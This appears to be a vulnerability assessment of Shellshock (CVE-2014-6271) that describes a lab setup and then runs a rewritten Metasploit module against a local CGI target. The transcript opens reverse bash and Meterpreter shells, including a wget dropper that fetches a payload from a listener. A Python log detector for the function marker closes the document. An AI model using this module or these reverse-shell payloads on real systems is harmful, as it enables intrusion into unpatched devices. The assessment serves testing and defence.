CVE-2014-6271
Description
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Ratings
Attacker Value: Very High
Exploitability: Very High
Technical Analysis
A Golden Oldie from 2014 that is still very relevant nowadays.
In my recent research of security vulnerabilities, I bumped into several targets that were still vulnerable to CVE-2014-6271 a.k.a. Shellshock and CVE-2014-6278. You should not be surprised that most of these targets are IoT based with an embedded Linux/Unix image running a vulnerable bash version. They typically do not get updated at all and are easy targets for a malicious actor to find an entry point into the network.
Metasploit modules like exploit/multi/http/apache_mod_cgi_bash_env_exec are pretty restricted to launch an attack due to the limited platform support (only x86) and payloads that can be leveraged in an attack. This brought me to rewrite this module a bit so that it would support multiple platforms (ARM, x86, x64, MIPS) and multiple payloads such as Unix Command and Linux Dropper. The module name is multi/http/bash_env_cgi_rce.
To test the module locally, you download a vulnerable bash version from https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz. Any version published before September 2014 is okay. Just extract it in a local directory and compile it with ./configure && make.
Configure an Apache or any other preferred web server to support CGI scripts. You can find tons of instructions on the web on how to do that.
Just create a script like the one below using the vulnerable bash version and add it to the cgi-bin directory of your preferred web server.

#!/bin/bash_CVE_2014_6271
echo "Content-type: text/plain"
echo
echo
echo "Hello World"

Download the module from here and follow the install instructions.
Start msfconsole and play around with the different options and payloads.
msf6 > use exploits/multi/http/bash_env_cgi_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bash_env_cgi_rce) > options

Module options (exploit/multi/http/bash_env_cgi_rce):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CVE          Automatic        yes       CVE to check/exploit (Accepted: Automatic, CVE-2014-6271, CVE-2014-6278)
   HEADER       User-Agent       yes       HTTP header to use
   METHOD       GET              yes       HTTP method to use
   PAYLOADSIZE  2048             yes       Payload size used by the CmdStager
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                     yes       Path to CGI script
   URIPATH                       no        The URI to use for this exploit (default is random)
   VHOST                         no        HTTP server virtual host

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix Command

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/bash_env_cgi_rce) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) > set targeturi /cgi-bin/test.cgi
targeturi => /cgi-bin/test.cgi
msf6 exploit(multi/http/bash_env_cgi_rce) > check
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] 192.168.201.10:80 - The target is vulnerable.
msf6 exploit(multi/http/bash_env_cgi_rce) > set lhost 192.168.201.10
lhost => 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash using vulnerability CVE-2014-6271.
[*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.10:35766) at 2023-05-21 15:01:17 +0000

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
Python Meterpreter payload example
msf6 exploit(multi/http/bash_env_cgi_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp using vulnerability CVE-2014-6271.
[*] Sending stage (24772 bytes) to 192.168.201.10
[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.10:35678) at 2023-05-21 15:03:48 +0000

meterpreter > sysinfo
Computer     : cerberus
OS           : Linux 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03)
Architecture : aarch64
Meterpreter  : python/linux
meterpreter > getuid
Server username: www-data
meterpreter >
Linux File dropper using payload: linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > set target 1
target => 1
msf6 exploit(multi/http/bash_env_cgi_rce) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > set CMDSTAGER::FLAVOR wget
CMDSTAGER::FLAVOR => wget
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp using vulnerability CVE-2014-6271.
[*] Using URL: http://192.168.201.10:8080/ZzirBKe
[*] Client 192.168.201.10 (Wget/1.21.3) requested /ZzirBKe
[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.10:34346) at 2023-05-21 15:10:11 +0000
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
If you use the CMDSTAGER::FLAVOR option bourne or printf, please ensure that your payload size is 2048 or below. You can control this with the option PAYLOADSIZE.
Have fun!!!
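Because the module above delivers its payload through an HTTP header (the HEADER option defaults to User-Agent), the CGI requests a web server logs are the natural place to spot Shellshock probes. The following detector is an added example, not part of the assessment above or of the Metasploit module: it parses Apache "combined" format lines (an assumption about the server's log format) and flags any request, Referer or User-Agent field carrying the exported-function marker "() {" that both CVE-2014-6271 and CVE-2014-6278 payloads begin with. The log lines are constructed for the example.

```python
import re
from typing import Optional

# Apache "combined" log format (assumed): host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_LOG = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Payloads for CVE-2014-6271 and CVE-2014-6278 both start with the bash exported
# function marker "() {"; whatever follows the closing "}" is what bash wrongly ran.
# Whitespace between "(", ")" and "{" is tolerated.
FUNC_MARKER = re.compile(r"\(\)\s*\{")

def parse_combined(line: str) -> Optional[dict]:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_LOG.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def shellshock_fields(line: str) -> list:
    """Names of the fields (request, referer, agent) carrying the function marker."""
    fields = parse_combined(line)
    if fields is None:
        return []
    return [name for name in ("request", "referer", "agent")
            if FUNC_MARKER.search(fields[name])]

def scan(lines) -> list:
    """(source host, flagged fields) for every line that looks like a Shellshock probe."""
    hits = []
    for line in lines:
        flagged = shellshock_fields(line)
        if flagged:
            hits.append((parse_combined(line)["host"], flagged))
    return hits

# Constructed sample log lines, not taken from any real server. The second line
# carries the widely published harmless test string in the User-Agent header,
# the third puts it in the Referer header, the fourth is not in combined format.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/May/2023:15:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [21/May/2023:15:01:17 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :;}; echo vulnerable"',
    '10.0.0.9 - - [21/May/2023:15:01:18 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "() { :;}; echo vulnerable" "curl/7.88"',
    "this line is not in combined format",
]

if __name__ == "__main__":
    for host, fields in scan(SAMPLE_LOG):
        print(f"possible Shellshock probe from {host} via {', '.join(fields)}")
```

Run it over a real access log with scan(open(path)) to get one tuple per suspicious request; a hit against a CGI path on a host with an unpatched bash is the case the assessment above describes.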